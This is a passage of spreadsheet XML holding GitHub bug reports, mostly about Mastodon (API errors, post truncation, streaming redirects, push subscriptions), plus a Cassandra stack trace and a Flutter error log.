[INFO] [NetworkInfo] Network state: [192.168.33.12] flutter: 2024-09-11 01:54:44.954787 [INFO] [NetworkInfo] Network state: [192.168.33.12] [ERROR:flutter/runtime/dart_vm_initializer.cc(41)] Unhandled Exception: HttpException: Content size exceeds specified contentLength. 132 bytes written while expected 33. [[82, 69, 65, 68, 32, 84, 72, 73, 83, 32, 66, 69, 70, 79, 82, 69, 32, 80, 79, 83, 84, 73, 78, 71, 32, 65, 78, 32, 73, 83, 83, 85, 69]] Message from debugger: killed </t>
  </si>
  <si>
    <t>https://github.com/k8ssandra/management-api-for-apache-cassandra/issues/18</t>
  </si>
  <si>
    <t>Unix Socket and TCP socket driver conflict</t>
  </si>
  <si>
    <t>`ERROR [nioEventLoopGroup-3-4] 2020-05-29 09:56:16,269 NodeOpsResources.java:240 - Error when executing request java.lang.IllegalArgumentException: Multiple entries with same key: 1c59a723-4cc4-4f16-bc07-d9b29d3eeedc=Node(endPoint=/10.244.217.176:0, hostId=1c59a723-4cc4-4f16-bc07-d9b29d3eeedc, hashCode=172d302f) and 1c59a723-4cc4-4f16-bc07-d9b29d3eeedc=Node(endPoint=/tmp/cassandra.sock, hostId=1c59a723-4cc4-4f16-bc07-d9b29d3eeedc, hashCode=44592dc4) at com.datastax.oss.driver.shaded.guava.common.collect.ImmutableMap.conflictException(ImmutableMap.java:215) at com.datastax.oss.driver.shaded.guava.common.collect.ImmutableMap.checkNoConflict(ImmutableMap.java:209) at com.datastax.oss.driver.shaded.guava.common.collect.RegularImmutableMap.checkNoConflictInKeyBucket(RegularImmutableMap.java:147) at com.datastax.oss.driver.shaded.guava.common.collect.RegularImmutableMap.fromEntryArray(RegularImmutableMap.java:110) at com.datastax.oss.driver.shaded.guava.common.collect.ImmutableMap$Builder.build(ImmutableMap.java:393) at com.datastax.oss.driver.internal.core.metadata.InitialNodeListRefresh.compute(InitialNodeListRefresh.java:81) at com.datastax.oss.driver.internal.core.metadata.MetadataManager.apply(MetadataManager.java:508) at com.datastax.oss.driver.internal.core.metadata.MetadataManager$SingleThreaded.refreshNodes(MetadataManager.java:328) at com.datastax.oss.driver.internal.core.metadata.MetadataManager$SingleThreaded.access$1700(MetadataManager.java:293) at com.datastax.oss.driver.internal.core.metadata.MetadataManager.lambda$refreshNodes$1(MetadataManager.java:166) at java.util.concurrent.CompletableFuture.uniApply(CompletableFuture.java:616) at java.util.concurrent.CompletableFuture$UniApply.tryFire(CompletableFuture.java:591) at java.util.concurrent.CompletableFuture$Completion.run(CompletableFuture.java:456) at io.netty.util.concurrent.AbstractEventExecutor.safeExecute(AbstractEventExecutor.java:164) at io.netty.util.concurrent.SingleThreadEventExecutor.runAllTasks(SingleThreadEventExecutor.java:472) at io.netty.channel.epoll.EpollEventLoop.run(EpollEventLoop.java:387) at io.netty.util.concurrent.SingleThreadEventExecutor$4.run(SingleThreadEventExecutor.java:989) at io.netty.util.internal.ThreadExecutorMap$2.run(ThreadExecutorMap.java:74) at io.netty.util.concurrent.FastThreadLocalRunnable.run(FastThreadLocalRunnable.java:30) at java.lang.Thread.run(Thread.java:748) INFO [nioEventLoopGroup-2-1] 2020-05-29 09:56:16,269 Cli.java:573 - address=/10.50.50.82:60720 url=/api/v0/probes/readiness status=500 Internal Server Error`</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/27194</t>
  </si>
  <si>
    <t>Post language strings with country code are invalid according to BCP47</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. Create a post with the language set to a locale with a country code (e.g. zh-HK) 2. Obtain the JSON-LD of the post (e.g. using `curl -H "Accept: application/json"`) 3. Note the keys of the `contentMap` object  Expected behaviour The first key of the object should be a valid locale string in accordance with BCP47 (e.g. zh-HK)  Actual behaviour The first key is in camel-case without a hyphen (e.g. zhHk)  Detailed description Introduced by #27099. It seems like this is how languages are currently stored in the database, so some conversion is likely needed before sending a post to inboxes.  Mastodon instance _No response_  Mastodon version _No response_  Technical details - Ruby version: 3.2.2 - Node.js version: 18.17.1</t>
  </si>
  <si>
    <t>? bug</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/27288</t>
  </si>
  <si>
    <t>https://mastodon.social/relationships?activity=dormant consistently results in an error page</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. Navigate to https://mastodon.social/relationships?activity=dormant I usually do it via Preferences - Follows and followers - Dormant 2. See the "We're sorry, but something went wrong on our end." error page  Expected behaviour A list of dormant people that I'm following  Actual behaviour An error page  Detailed description _No response_  Mastodon instance mastodon.social  Mastodon version v4.2.1-rc1+pr-27261-37da69c  Browser name and version Google Chrome Version 117.0.5938.132 (Official Build) (64-bit)  Operating system Debian  Technical details _No response_</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/27305</t>
  </si>
  <si>
    <t>Mastodon 4.2.x randomly truncates posts coming in from at least Hubzilla</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. Have a Hubzilla channel with PubCrawl on and connections on mastodon.social as an example of an instance that runs at least Mastodon 4.2.0. 2. Create a post on Hubzilla, preferably one that's significantly longer than 500 characters. Add at least one not-too-common hashtag so it can be found more easily. 3. Go to `https://mastodon.social/tags/&lt;the hashtag used in the post&gt;` in the Web browser of your choice (tested with the original Mozilla build of Firefox on Debian GNU/Linux). 4. Scroll down until you find your post. 5. Compare how mastodon.social renders your post with what your original Hubzilla post looks like.  Expected behaviour The full post text is always shown on Mastodon.  Actual behaviour Chances are the post is truncated and incomplete.  Detailed description Since Mastodon 4.2.0 was released, it seems to randomly truncate posts from at least Hubzilla. It does so both to posts that came in after the upgrade of an instance to 4.2.x and to posts that have been on an instance before the 4.2.x upgrade. It doesn't happen to each post. It happens both to Hubzilla posts (first posts in a thread) and to Hubzilla comments (replies to posts which are something different on Hubzilla), and it happens to comments on both Mastodon and Hubzilla posts. Also, even truncated posts can still be over 500 characters long on instances that only allow for 500 characters. And posts that are well under 500 characters are truncated, too. There seems to be no pattern. There is nothing that indicates when and why a post is truncated, other than all truncated posts I know about have hashtags in the text rather than all hashtags at the end or no hashtags at all. Also, Hubzilla posts with summaries that became/become Mastodon posts with content warnings seem to never be truncated. That said, posts are never truncated in the middle of a word. The issue clearly lies on Mastodon's side. It started happening with the release of Mastodon 4.2.0 while Hubzilla did not have a new release at that time. Also, Mastodon 4.1.9 shows posts perfectly fine which Mastodon 4.2.0 truncates. Here is a proof, although it's a minor example. Original Hubzilla comment: https://hub.netzgemeinde.eu/display/b64.aHR0cHM6Ly9odWIubmV0emdlbWVpbmRlLmV1L2l0ZW0vMzU0NTJkMmQtNDI0OC00NjI5LTg3MjgtZWE0YTlhOWIyNDBk Mastodon 4.1.9 (noc.social) showing the whole post: https://noc.social/@MarvinTheMartian/111115829359100943 (scroll down to my post) Mastodon 4.2.0 (tooters.org), full stop at the end of the last sentence is missing: https://tooters.org/@victor/111115391740487664 (scroll down to my post) More examples can be found by [searching mastodon.social for the hashtag #ImageDescription](https://mastodon.social/tags/imagedescription) and finding at my posts. For example: Original Hubzilla comment, very short even: https://hub.netzgemeinde.eu/display/b64.aHR0cHM6Ly9odWIubmV0emdlbWVpbmRlLmV1L2l0ZW0vYWFjOWE2YTUtZTc1Zi00Njc5LWFiNjgtNGYyYzI5ZDJmMjI5 Mastodon 4.2.0 (mastodon.hardcoredevs.com), truncated mid-paragraph after the hashtag `#ImageDescription`: https://mastodon.hardcoredevs.com/@Andres/110894302610589500 (my comment is right below) This is a special case because the whole thread was written before Mastodon 4.2.0. Original Hubzilla comment: https://hub.netzgemeinde.eu/display/b64.aHR0cHM6Ly9odWIubmV0emdlbWVpbmRlLmV1L2l0ZW0vOGYxYTQwMTUtNTc0Zi00YzEzLThkZTMtNDdhN2ViNGVjYjc1 Mastodon 4.2.1-rc1+pr-27261-37da69c (mastodon.social), entire second paragraph is missing: https://mastodon.social/@hikingdude/111091316259559387 (my comment is right below) Original Hubzilla comment: https://hub.netzgemeinde.eu/display/b64.aHR0cHM6Ly9odWIubmV0emdlbWVpbmRlLmV1L2l0ZW0vMDAyMDk4MjgtM2VjOC00MDUwLTlhN2QtMmIzM2M2Njk3OWVj Mastodon 4.2.1-rc1+pr-27261-37da69c (mastodon.social), truncated mid-paragraph after the hashtag `#Friendica`: https://mastodon.social/@urlyman/111028486166963680 (my comment is right below) Original Hubzilla comment: https://hub.netzgemeinde.eu/channel/jupiter_rowland?mid=b64.aHR0cHM6Ly9odWIubmV0emdlbWVpbmRlLmV1L2l0ZW0vZDIzY2NkMjItMzUzNy00ODI4LWEzMDgtYjQ5YjY0MGU5MTQx Mastodon 4.2.0 (ieji.de), truncated mid-paragraph after the hashtag `#AltText`: https://ieji.de/@soonix/111008439620893974 (my comment is right below) It also happens to Hubzilla posts. I don't have an example of a Hubzilla post truncated on Mastodon that can be seen by scrolling up from a Mastodon reply, but here is an example with a raw Mastodon link (which will open Hubzilla in a Web browser, though): Original Hubzilla post: https://hub.netzgemeinde.eu/channel/jupiter_rowland?mid=b64.aHR0cHM6Ly9odWIubmV0emdlbWVpbmRlLmV1L2l0ZW0vMTM2MmE1NmUtYzU0Ny00MDU4LTgxZGMtNTRiZmMzMzgxNDVh Mastodon 4.2.1-rc1+pr-27261-37da69c (mastodon.social), the last paragraph is missing: https://mastodon.social/@jupiter_rowland@hub.netzgemeinde.eu/111158674653031871 The same may happen to posts from other projects, especially Friendica and (streams). I don't have any evidence of this happening or not happening yet. Also, I can't test this on mobile apps, so I can't say if this is a Web interface or backend issue.  Mastodon instance mastodon.social, fosstodon.org, norden.social, tooters.org, ieji.de, mastodon.hardcoredevs.com  Mastodon version v4.2.0, v4.2.1-rc1+pr-27261-37da69c  Browser name and version Firefox 118.0.1, original Mozilla build  Operating system Debian 13 "trixie" (testing)  Technical details _No response_</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/28003</t>
  </si>
  <si>
    <t>Unable to mute users without web UI error</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. Try to mute a user  Expected behaviour User is muted  Actual behaviour "Oops, an expected error has occurred" (It appears the user is also then muted.)  Detailed description _No response_  Mastodon instance vmst.io, mastodon.online  Mastodon version v4.3.0-alpha.0, v4.3.0-nightly.2023-11-19  Browser name and version Safari  Operating system macOS  Technical details _No response_</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/28233</t>
  </si>
  <si>
    <t>LinkCrawlWorker throws a NoMethodError `[]` for `nilClass` because Link Oembed json resolves to "null"</t>
  </si>
  <si>
    <t>This is mostly a reproducibility report for a certain bug that'll cause `LinkCrawlWorker`s to pile up in the dead queue. Given a status which contains the following link; - https://www.fimfiction.net/oembed\?url\=https%3A%2F%2Fwww.fimfiction.net%2Fblog%2F1027689%2Fasking-for-help It'll eventually crash a `LinkCrawlWorker` with the following error; `NoMethodError: undefined method '[]' for nil:NilClass` Because of the following backtrace; &lt;details&gt; &lt;summary&gt;Backtrace&lt;/summary&gt;  live/app/services/fetch_oembed_service.rb:103:in `validate' live/app/services/fetch_oembed_service.rb:88:in `fetch!' live/app/services/fetch_oembed_service.rb:19:in `call' live/app/services/fetch_link_card_service.rb:107:in `attempt_oembed' live/app/services/fetch_link_card_service.rb:42:in `process_url' live/app/services/fetch_link_card_service.rb:28:in `block in call' live/app/models/concerns/lockable.rb:12:in `block (2 levels) in with_redis_lock' live/vendor/bundle/ruby/3.0.0/gems/mario-redis-lock-1.2.1/lib/redis_lock.rb:44:in `acquire' live/app/models/concerns/lockable.rb:10:in `block in with_redis_lock' live/vendor/bundle/ruby/3.0.0/gems/connection_pool-2.4.1/lib/connection_pool.rb:110:in `block (2 levels) in with' live/vendor/bundle/ruby/3.0.0/gems/connection_pool-2.4.1/lib/connection_pool.rb:109:in `handle_interrupt' live/vendor/bundle/ruby/3.0.0/gems/connection_pool-2.4.1/lib/connection_pool.rb:109:in `block in with' live/vendor/bundle/ruby/3.0.0/gems/connection_pool-2.4.1/lib/connection_pool.rb:106:in `handle_interrupt' live/vendor/bundle/ruby/3.0.0/gems/connection_pool-2.4.1/lib/connection_pool.rb:106:in `with' live/app/lib/redis_configuration.rb:10:in `with' live/app/models/concerns/redisable.rb:9:in `with_redis' live/app/models/concerns/lockable.rb:9:in `with_redis_lock' live/app/services/fetch_link_card_service.rb:26:in `call' live/app/workers/link_crawl_worker.rb:9:in `perform'  &lt;/details&gt; Because `body` on the following line will become the string `"null"`; https://github.com/mastodon/mastodon/blob/89a8e6e6227eb901b5811d8417d81dc8ab1427a9/app/services/fetch_oembed_service.rb#L84</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/28258</t>
  </si>
  <si>
    <t>Status edits are not sent to streaming clients if they do not appear in a subscribed feed</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. Send a status with direct visibility to a user who doesn't follow you 2. Edit the sent status 3. The recipient does not see the status edit unless they refresh  Expected behaviour The recipient should have received the edited status  Actual behaviour The recipient does not see the status edit unless they refresh  Detailed description _No response_  Mastodon instance _No response_  Mastodon version v4.2.3  Technical details - Ruby version: 3.2.2 - Node.js version: v20.6.1</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/28381</t>
  </si>
  <si>
    <t>/api/v1/directory returning 500 on Mastodon 4.1.11</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem On a Mastodon 4.1.11 instance: 1. Go to `your-domain.tld/directory` on a browser. A `GET` request is made to `/api/v1/directory?order=active&amp;local=false&amp;limit=20` 2. Check the mastodon-web logs and the database logs  Expected behaviour The `/directory` page shows some profiles  Actual behaviour The `/directory` page loads, but doesn't show any profile  Detailed description The API call to `/api/v1/directory?order=active&amp;local=false&amp;limit=20` gives a `500` error mastodon-web logs:  [3f261ece-7921-40e8-83a1-15a7577819f0] ActiveRecord::StatementInvalid (PG::AmbiguousColumn: ERROR: column reference "last_status_at" is ambiguous LINE 1:  NULL AND "accounts"."discoverable" = $2 ORDER BY last_statu ^ ): [3f261ece-7921-40e8-83a1-15a7577819f0] [3f261ece-7921-40e8-83a1-15a7577819f0] app/controllers/api/v1/directories_controller.rb:8:in `show' [3f261ece-7921-40e8-83a1-15a7577819f0] app/controllers/concerns/localized.rb:11:in `set_locale' [3f261ece-7921-40e8-83a1-15a7577819f0] lib/mastodon/rack_middleware.rb:9:in `call' [3f261ece-7921-40e8-83a1-15a7577819f0] lib/public_file_server_middleware.rb:18:in `call'  Postgres logs:  2023-12-15T12:11:50.926973550+01:00 2023-12-15 11:11:50.926 UTC [789030] ERROR: column reference "last_status_at" is ambiguous at character 2689 2023-12-15T12:11:50.927009728+01:00 2023-12-15 11:11:50.926 UTC [789030] STATEMENT: SELECT "accounts"."username" AS t0_r0, "accounts"."domain" AS t0_r1, "accounts"."private_key" AS t0_r2, "accounts"."public_key" AS t0_r3, "accounts"."created_at" AS t0_r4, "accounts"."updated_at" AS t0_r5, "accounts"."note" AS t0_r6, "accounts"."display_name" AS t0_r7, "accounts"."uri" AS t0_r8, "accounts"."url" AS t0_r9, "accounts"."avatar_file_name" AS t0_r10, "accounts"."avatar_content_type" AS t0_r11, "accounts"."avatar_file_size" AS t0_r12, "accounts"."avatar_updated_at" AS t0_r13, "accounts"."header_file_name" AS t0_r14, "accounts"."header_content_type" AS t0_r15, "accounts"."header_file_size" AS t0_r16, "accounts"."header_updated_at" AS t0_r17, "accounts"."avatar_remote_url" AS t0_r18, "accounts"."locked" AS t0_r19, "accounts"."header_remote_url" AS t0_r20, "accounts"."last_webfingered_at" AS t0_r21, "accounts"."inbox_url" AS t0_r22, "accounts"."outbox_url" AS t0_r23, "accounts"."shared_inbox_url" AS t0_r24, "accounts"."followers_url" AS t0_r25, "accounts"."protocol" AS t0_r26, "accounts"."id" AS t0_r27, "accounts"."memorial" AS t0_r28, "accounts"."moved_to_account_id" AS t0_r29, "accounts"."featured_collection_url" AS t0_r30, "accounts"."fields" AS t0_r31, "accounts"."actor_type" AS t0_r32, "accounts"."discoverable" AS t0_r33, "accounts"."also_known_as" AS t0_r34, "accounts"."silenced_at" AS t0_r35, "accounts"."suspended_at" AS t0_r36, "accounts"."hide_collections" AS t0_r37, "accounts"."avatar_storage_schema_version" AS t0_r38, "accounts"."header_storage_schema_version" AS t0_r39, "accounts"."devices_url" AS t0_r40, "accounts"."sensitized_at" AS t0_r41, "accounts"."suspension_origin" AS t0_r42, "accounts"."trendable" AS t0_r43, "accounts"."reviewed_at" AS t0_r44, "accounts"."requested_review_at" AS t0_r45, "account_stats_accounts"."id" AS t1_r0, "account_stats_accounts"."account_id" AS t1_r1, "account_stats_accounts"."statuses_count" AS t1_r2, "account_stats_accounts"."following_count" AS t1_r3, "account_stats_accounts"."followers_count" AS t1_r4, "account_stats_accounts"."created_at" AS t1_r5, "account_stats_accounts"."updated_at" AS t1_r6, "account_stats_accounts"."last_status_at" AS t1_r7 FROM "accounts" LEFT OUTER JOIN "users" ON "users"."account_id" = "accounts"."id" LEFT OUTER JOIN "account_stats" ON "account_stats"."account_id" = "accounts"."id" LEFT OUTER JOIN "account_stats" "account_stats_accounts" ON "account_stats_accounts"."account_id" = "accounts"."id" WHERE ("accounts"."domain" IS NOT NULL OR "users"."approved" = $1 AND "users"."confirmed_at" IS NOT NULL) AND "accounts"."suspended_at" IS NULL AND "accounts"."moved_to_account_id" IS NULL AND "accounts"."silenced_at" IS NULL AND "accounts"."discoverable" = $2 ORDER BY last_status_at DESC NULLS LAST LIMIT $3  In the generated query, the `LEFT OUTER JOIN "account_stats" ON "account_stats"."account_id" = "accounts"."id" LEFT OUTER JOIN "account_stats" "account_stats_accounts" ON "account_stats_accounts"."account_id" = "accounts"."id"` seems weird.  Mastodon instance https://mastodon.libre-entreprise.com  Mastodon version v4.1.11  Technical details Mastodon running with Docker, using official image</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/28455</t>
  </si>
  <si>
    <t>The summary for converted ActivityPub objects must be treated as html according to the ActivityStreams specification</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. Retrieve a non-note object like an `Event` from with a HTML summary. 2. The resulting post will not be rendered/converted as HTML but as plain text.  Expected behaviour The summary should be treated as HTML by default.  Actual behaviour The summary is treated as plain text. The following Screenshot shows what a event received from Gancio then looks like. ![Screenshot_from_2023-12-20_01-20-36](https://github.com/mastodon/mastodon/assets/99024746/d9472d8a-2e0c-4648-b1e5-574428110565)  Detailed description The feature introduced in https://github.com/mastodon/mastodon/pull/9823 is basically a great one, without Mastodon implementing custom renderings for ActivityPub objects like `Event` it has basic support for them. The actual convertion likely takes place here: https://github.com/mastodon/mastodon/blob/2463b53363a621c1e18223bda5c47a663707a22c/app/lib/activitypub/activity/create.rb#L371-L373. The [ActivityStreams vocabulary specification](https://www.w3.org/TR/activitystreams-vocabulary/#dfn-summary) states that &gt; **Summary**: A natural language summarization of the object encoded as HTML. This will cause interoperability issues with future Gancio, Mobilizon and WordPress ActivityPub releases. Altough the ActivityPub spec does not mention it, one might also think of accepting custom `MediaType` for the summary, to handle both plain/text and HTML summaries. See https://framagit.org/les/gancio/-/issues/321#note_2038846  Mastodon instance All  Mastodon version Since https://github.com/mastodon/mastodon/pull/9823  Technical details _No response_</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/28539</t>
  </si>
  <si>
    <t>Streaming endpoint on Vagrant sends 301 redirect to localhost</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem I wanted to test an in-development Mastodon client's use of the streaming API endpoints such as `/api/v1/streaming/user`, so I set up a development instance using Vagrant as follows: 1. cloned the git repo on Ubuntu 22.04, obtaining the head commit 6374358357ee81b5f137f471f028a56974109155 2. ran `vagrant up` in the root of the checkout, and authorised it to add `mastodon.local` to my `/etc/hosts` 3. ran the suggested startup command `vagrant ssh -c "cd /vagrant &amp;&amp; foreman start"` 4. created a test user on the instance using the web UI, and authenticated my test client The client tried to access the streaming API, by sending an HTTP request as follows (observed via `strace`, since in this environment we're using cleartext HTTP):  GET /api/v1/streaming/user HTTP/1.1 authorization: Bearer LHfBPlUXWkgVSZl5DMSiBOTD1CeaidAWwWs8TiUKmUk accept: */* host: mastodon.local   Expected behaviour I expected that this GET request would return a 200 status and begin delivering chunked data, starting with a line such as ":)" and continuing with ":thump" heartbeats interleaved with update events.  Actual behaviour The web server on the Vagrant instance returned a 301 redirect to a URL on "localhost", so my client next tried to connect to the host machine, and got 404 because _that_ web server knows nothing about the test Mastodon instance.  Detailed description The full HTTP response from the Mastodon test server was:  HTTP/1.1 301 Moved Permanently X-Frame-Options: SAMEORIGIN X-XSS-Protection: 0 X-Content-Type-Options: nosniff X-Download-Options: noopen X-Permitted-Cross-Domain-Policies: none Referrer-Policy: strict-origin-when-cross-origin X-RateLimit-Limit: 300 X-RateLimit-Remaining: 299 X-RateLimit-Reset: 2023-12-31T14:55:00.170985Z Location: http://localhost/api/v1/streaming/user Content-Type: text/html; charset=utf-8 Cache-Control: private, no-store Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; form-action 'none' X-Request-Id: 0b582768-c006-4a45-b808-49803c87e1d4 X-Runtime: 0.126129 Server-Timing: cache_read.active_support;dur=0.02, sql.active_record;dur=0.66, cache_generate.active_support;dur=1.31, cache_write.active_support;dur=0.11, instantiation.active_record;dur=0.23, start_processing.action_controller;dur=0.00, redirect_to.action_controller;dur=0.03, process_action.action_controller;dur=7.38 vary: Authorization, Origin Content-Length: 0   Mastodon instance mastodon.local (installed via Vagrant)  Mastodon version v4.3.0-alpha.0  Technical details Software versions that `vagrant up` installed for me:  vagrant@mastodon:~$ ruby --version ruby 3.2.2 (2023-03-30 revision e51014f9c0) [x86_64-linux] vagrant@mastodon:~$ node --version v20.10.0 </t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/29071</t>
  </si>
  <si>
    <t>Regression: Suggestion.source is documented as a string, currently returns list of strings</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. On `mastodon.social`, call [`/api/v2/suggestions`](https://docs.joinmastodon.org/methods/suggestions/#v2) 2. Attempt to decode output as documented, as an array of [`Suggestion`](https://docs.joinmastodon.org/entities/Suggestion/) objects 3. Decoding fails because object has changed from documented format  Expected behaviour `Suggestion.source` should be a string  Actual behaviour `Suggestion.source` is an array of strings  Detailed description I'm not sure when this changed, but it's not documented, or backwards compatible with existing clients. My suggestion for the fix would be to keep `source` as a string, populate it with the first or most important of the possible source strings, deprecate `source`, and return the full list of sources as a new `sources` property on `Suggestion`.  Mastodon instance mastodon.social  Mastodon version v4.3.0-nightly.2024-02-02  Technical details _No response_</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/29127</t>
  </si>
  <si>
    <t>Possible to create domain blocks when a stricter limit already exists in Admin UI</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. Go to `/admin/instances?limited=1` to manage federation 2. Add a domain block for `example` (noop/none severity) 3. Using the API try to create a domain block for `test.example` observe that an error is returned 4. Go back to the admin UI and create a domain block for `test.example` observe that no error is returned and the block is successfully created.  Expected behaviour Both methods for creating domain blocks should have same behaviour  Actual behaviour The API failed whilst the Admin UI succeeded  Detailed description This bug affects IFTAS FediCheck, where we weren't observing the same logic as `DomainBlock.rule_for` when attempting to create a domain block, which meant an existing block of `example` would fail the block creation of `test.example` leaving us out of sync with the Mastodon server (we also weren't handling the error response from the API correctly.  Mastodon instance _No response_  Mastodon version main  Technical details If this is happening on your own Mastodon server, please fill out those: - Ruby version: v 3.2.3 - Node.js version: v20.11.0</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/30039</t>
  </si>
  <si>
    <t>Idempotency-Key ignored when scheduling a post</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem Make multiple requests to schedule a post to `POST /api/v1/statuses`, e.g. with this body `{"status":"Test","spoiler_text":"","visibility":"private","sensitive":false,"media_ids":[],"media_attributes":[],"scheduled_at":"2024-04-24T14:59:42.868Z","language":"en"}` and with the same `Idempotency-Key` header.  Expected behaviour There is one scheduled status created because the Idempotency-Key was the same.  Actual behaviour Multiple scheduled statuses were created  Detailed description _No response_  Mastodon instance mastodon.social  Mastodon version 4.3.0-nightly.2024-04-18  Technical details _No response_</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/30103</t>
  </si>
  <si>
    <t>API to subscribe to push notification does not seem to delete previous subscription?</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. [POST `/api/v1/push/subscription`](https://docs.joinmastodon.org/methods/push/#create) many times. (Not sure if many times in a short time matters though, just stating based on what I (accidentally) did) 2. Send a post via another account, tagging the logged in user. 3. Wait for notification to arrive 4. Realised that tons of notifications came flooding in, only one decoded correctly (non unexpected, since my app only saved the latest keys)  Expected behaviour 1 notification with correct contents.  Actual behaviour hundreds? of notifications.  Detailed description Now, I am not entirely sure if the fault is on my end, but I am somewhat confident that it is the API's fault. Please advise if I'm doing something terribly wrong without noticing I am referring to the [POST `/api/v1/push/subscription`](https://docs.joinmastodon.org/methods/push/#create) endpoint. So the story here is that, new (unreleased) app here, where a bug occurred, which resulted in an endless loop, causing the app to accidentally send out many requests. I realised this probably after like 2 seconds, shut the app down, fixed the issue, and relaunched the app. I sent a post out using another account, tagging my app's logged in account, the rest is explained in the steps to reproduce section. The documentation for that, states: &gt; If you create a new subscription, the old subscription is deleted. In this case, it didn't seem to be true? Eventually, I also tried calling [DELETE `/api/v1/push/subscription`](https://docs.joinmastodon.org/methods/push/#delete), but symptoms remains. My setup is for a watchOS app. Notifications are relayed using [metatext-apns](https://github.com/metabolist/metatext-apns), which by the looks of it is just a simple relay so that shouldn't be the cause, right? I am very new to this Mastodon/Web Push notifications stuff, so please let me know if you believe it's an issue from my end. Thank you!  Mastodon instance mastodon.social  Mastodon version v4.3.0-nightly.2024-04-18  Technical details - watchOS 10.2 - Both accounts are on mastodon.social</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/30578</t>
  </si>
  <si>
    <t>Without ImageMagick, uploading emoji files is not possible</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. Set an emoji name and select the emoji file 2. Clicking Upload immediately throws an error  Expected behaviour Successful upload and emoji added  Actual behaviour Imediate error, failed upload  Detailed description After #30090, when uploading an emoji file, an error is immediately thrown.  INFO -- : [747998e2-f015-4df6-9828-21284dd45a61] [paperclip] Trying to link /tmp/RackMultipart20240606-4122054-jvtb5n.gif to /tmp/727f3ea9cd9c5f222fec438bb341a8a020240606-4122054-79d0xi.gif INFO -- : [747998e2-f015-4df6-9828-21284dd45a61] Command :: identify -format '%wx%h,%[exif:orientation]' '/tmp/727f3ea9cd9c5f222fec438bb341a8a020240606-4122054-79d0xi.gif[0]' 2&gt;/dev/null INFO -- : [747998e2-f015-4df6-9828-21284dd45a61] method=POST path=/admin/custom_emojis format=html controller=Admin::CustomEmojisController action=create status=500 allocations=3481 duration=45.68 view=0.00 db=11.68 FATAL -- : [747998e2-f015-4df6-9828-21284dd45a61] [747998e2-f015-4df6-9828-21284dd45a61] Paperclip::Errors::CommandNotFoundError (Could not run the `identify` command. Please install ImageMagick.): [747998e2-f015-4df6-9828-21284dd45a61] lib/paperclip/attachment_extensions.rb:21:in `block in post_process_style' [747998e2-f015-4df6-9828-21284dd45a61] lib/paperclip/attachment_extensions.rb:20:in `each' [747998e2-f015-4df6-9828-21284dd45a61] lib/paperclip/attachment_extensions.rb:20:in `inject' [747998e2-f015-4df6-9828-21284dd45a61] lib/paperclip/attachment_extensions.rb:20:in `post_process_style' [747998e2-f015-4df6-9828-21284dd45a61] app/controllers/admin/custom_emojis_controller.rb:21:in `create' [747998e2-f015-4df6-9828-21284dd45a61] app/controllers/concerns/localized.rb:11:in `set_locale' [747998e2-f015-4df6-9828-21284dd45a61] lib/mastodon/rack_middleware.rb:9:in `call'  I enabled `libvips` and uninstalled `ImageMagick`. If emojis are meant to be processed by IM instead, I'll reinstall it again.  Mastodon instance bolha.one  Mastodon version v4.3.0-alpha.4-4655be0  Technical details _No response_</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/30783</t>
  </si>
  <si>
    <t>"Delete &amp; re-draft" is only deleting</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. Write a post in the web interface. 2. Select the "Delete &amp; re-draft" option from the  menu. 3. Post is deleted, but "Oops an error occurred" happens. 4. Post content is lost.  Expected behaviour Post is lost  Actual behaviour Post is ready to draft  Detailed description https://github.com/mastodon/mastodon/assets/3002053/c136f811-2a35-4cd7-85d1-2c3f828b5191  Mastodon instance vmst.io  Mastodon version v4.3.0-alpha.4  Browser name and version Multiple  Operating system Multiple  Technical details Reproduced on mastodon.online as well</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/30860</t>
  </si>
  <si>
    <t>Unable to link to URLs ending with a @</t>
  </si>
  <si>
    <t xml:space="preserve"> Steps to reproduce the problem 1. Look at this post: https://mastodon.gamedev.place/@CarePackage17/112688958098239356 2. Try clicking the link 3. Observe it leads to a 404 instead of https://gta.fandom.com/wiki/TW@  Expected behaviour The link should include the @ as part of its URL: https://gta.fandom.com/wiki/TW@  Actual behaviour the link gets broken  Detailed description _No response_  Mastodon instance mastodon.gamedev.place  Mastodon version 4.2.9  Browser name and version Firefox Nightly 129  Operating system Android  Technical details _No response_</t>
  </si>
  <si>
    <t>https://github.com/mastodon/mastodon/issues/31091</t>
  </si>
  <si>
    <t>Duplicate key "orderedItems" in outbox.json when exporting a user's archive</t>
  </si>
  <si>
